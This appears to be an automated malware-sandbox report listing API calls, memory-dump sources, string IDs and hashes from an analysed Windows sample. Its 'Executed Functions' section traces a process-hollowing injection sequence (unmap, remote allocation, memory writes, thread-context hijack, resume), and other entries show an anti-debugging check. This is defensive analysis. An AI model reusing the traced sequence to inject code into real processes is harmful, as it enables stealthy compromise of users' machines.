  • Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE
  • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
• _doexit.LIBCMT ref: 00427C50
  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
  • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
  • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
  • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
• String ID: i;B
• API String ID: 2447380256-472376889
• Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
• Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
• Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
• Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: _memmove_strtok
• String ID:
• API String ID: 3446180046-0
• Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
• Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
• Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
• Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock
• String ID:
• API String ID: 2974526305-0
• Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
• Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
• Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
• Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
• __isleadbyte_l.LIBCMT ref: 0043C6DB
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
• Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
• Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
• Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
• lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
• WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
• CloseHandle.KERNEL32(00000000), ref: 0040F1A8
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Similarity
• API ID: File$CloseCreateHandleWritelstrlen
• String ID:
• API String ID: 1421093161-0
• Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
• Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
• Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
• Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32 ref: 004127B9
• _malloc.LIBCMT ref: 004127C3
  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
• _memset.LIBCMT ref: 004127CE
• WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
• String ID:
• API String ID: 2824100046-0
• Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
• Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
• Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
• Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
• Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
• Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
• Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
• Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
• Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
• Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
• Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
• Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID:
• String ID: .\crypto\err\err.c$unknown
• API String ID: 0-565200744
• Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
• Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
• Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
• Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
Uniqueness
Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 0042419D
• IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Similarity
• API ID: DebuggerPresent_memset
• String ID: i;B
• API String ID: 2328436684-472376889
• Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
• Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
• Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
• Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
• ___raise_securityfailure.LIBCMT ref: 0042AC7A
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: 8Q
• API String ID: 3761405300-2096853525
• Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
• Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
• Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
• Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
Uniqueness
Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                      • _memset.LIBCMT ref: 00413C83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                      • String ID: vector<T> too long
                                                                                      • API String ID: 1327501947-3788999226
                                                                                      • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                      • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                      • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                      • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00480686
                                                                                        • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                      Strings
                                                                                      • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                      • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: _memset_raise
                                                                                      • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                      • API String ID: 1484197835-3867593797
                                                                                      • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                      • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

                                                                                      APIs
                                                                                      • DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
                                                                                      • __invoke_watson.LIBCMT ref: 004242CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DecodePointer__invoke_watson
                                                                                      • String ID: i;B
                                                                                      • API String ID: 4034010525-472376889
                                                                                      • Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                      • Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
                                                                                      • Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                      • Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F251
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                      • String ID: TeM
                                                                                      • API String ID: 757275642-2215902641
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                                                                                      Executed Functions

                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 007C0156
                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 007C016C
                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 007C0255
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007C0270
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007C0283
                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 007C029F
                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007C02C8
                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007C02E3
                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 007C0304
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 007C032A
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 007C0399
                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007C03BF
                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 007C03E1
                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 007C03ED
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 007C0412
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                      • String ID:
                                                                                      • API String ID: 2875986403-0
                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction ID: 4a24ccb8013459170615a5ca1fac6853b2334675bcbdeacffc5a615d32749a58
                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction Fuzzy Hash: 30B1B674A00208EFDB44CF98C895F9EBBB5BF88314F248158E509AB391D775AE41CF94

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(user32), ref: 007C06E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                                                                                      • API String ID: 1029625771-3105132389
                                                                                      • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction ID: 9cb2ad3676cc008af11d43fc5a0787a0f2ad3af0172fa02dad973dfbf389bae2
                                                                                      • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction Fuzzy Hash: B6A24460D0C6E8CDEB21C668CC4C7DDBEB51B26749F0841D9858C66292C7BB1B98CF76

                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 007C0533
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                      • API String ID: 716092398-2341455598
                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction ID: 5d9b2f0f91b5198a19d247993f43767eea540c5b7cfd9527319795bcae2398a2
                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction Fuzzy Hash: C1510870D08388DBEB11CB98D849BEDBFB26F11708F14405CD5446F286C3BA5669CBA6

                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007C05EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID: apfHQ$o
                                                                                      • API String ID: 3188754299-2999369273
                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction ID: 5e224ea3a883615b4e56b37105faf11a118fa16a4c7dcc08dea4b02b14f4b70a
                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction Fuzzy Hash: 54011E70C0424CEADB14DFA8C5187AEBFB5AF41308F14809DC4192B242D77A9B58CBE1

                                                                                      Non-executed Functions

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: _free$ExitProcess___crt
                                                                                      • String ID: E~$E~$ProgramFiles=C:\Program Files\Common Files
                                                                                      • API String ID: 1022109855-3198583532
                                                                                      • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction ID: 85dc49bacd0cd5567c6a1f00bb21a90cfa81a77bea49efc2f74cc5d58a7fe5f4
                                                                                      • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction Fuzzy Hash: 9A31D4319023D0DBCB616F16FC8584977A4FB5A320354863AF9085B2B0CFB85DD8AF92

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 65388428-3277548187
                                                                                      • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction ID: 0e9e0c0ab0d92d5a66e5bd3351fe6c4cb2a9e2987fa3dae7c12611a1ecd56731
                                                                                      • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction Fuzzy Hash: F5515D71D40219FBDB10DBA5DD46FEFBBB8FB04744F104026FA05B6280E7786A018BA5

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0080FC1F
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC34
                                                                                      • std::exception::exception.LIBCMT ref: 0080FC4D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC62
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0080FC74
                                                                                        • Part of subcall function 0080F914: std::exception::exception.LIBCMT ref: 0080F92E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FC82
                                                                                      • std::exception::exception.LIBCMT ref: 0080FC9B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0080FCB0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                      • String ID: leM
                                                                                      • API String ID: 2862078307-2926266777
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: ea89c3e76758f19535afa87b92f9db44463cb11d97bfdb3196f9742cd57ccfa4
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 7A11BC79C0020DFBCF00FFA5D959CEDBB7CAA04344F808566BE1497641EB78A7488B95

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3721157643-0
                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction ID: b178d2f77c0d95c29a4a50ffdec394bb1fa4e7b2135067234135747f3ac67ac7
                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction Fuzzy Hash: EC1127B2501694AAC26162B60C17FFF3BDC9F4A701F440079FA8CE1182DA1C5A0593B2

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 8f7e11f6271d35c6fbfd157cfd9df88b7806d8668f0f09ba4d04587f68b445ae
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: 69515EB1D40249FBDF11DFA1DC46FEEBB79BB04704F10402AF905B6281E779AA058BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: Exception@8Throw$_memset_sprintf
• String ID: ^u
• API String ID: 217217746-3277548187
• Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
• Instruction ID: f38da62896a2ef543d487d861a8ad112a2e69214d0deb52fffb856a83834f8d1
• Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
• Instruction Fuzzy Hash: 12514171D40249EADF11DFA1DD46FEEBBB9EB08744F100139FA05B6281E6786A058BA4
Uniqueness Score: -1.00%

APIs
• __getptd_noexit.LIBCMT ref: 008866DD
  • Part of subcall function 007E59BF: __calloc_crt.LIBCMT ref: 007E59E2
  • Part of subcall function 007E59BF: __initptd.LIBCMT ref: 007E5A04
• __calloc_crt.LIBCMT ref: 00886700
• __get_sys_err_msg.LIBCMT ref: 0088671E
• __invoke_watson.LIBCMT ref: 0088673B
• __get_sys_err_msg.LIBCMT ref: 0088676D
• __invoke_watson.LIBCMT ref: 0088678B
Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
• String ID: -716T771$R_REVISION=5507
• API String ID: 4066021419-1087220190
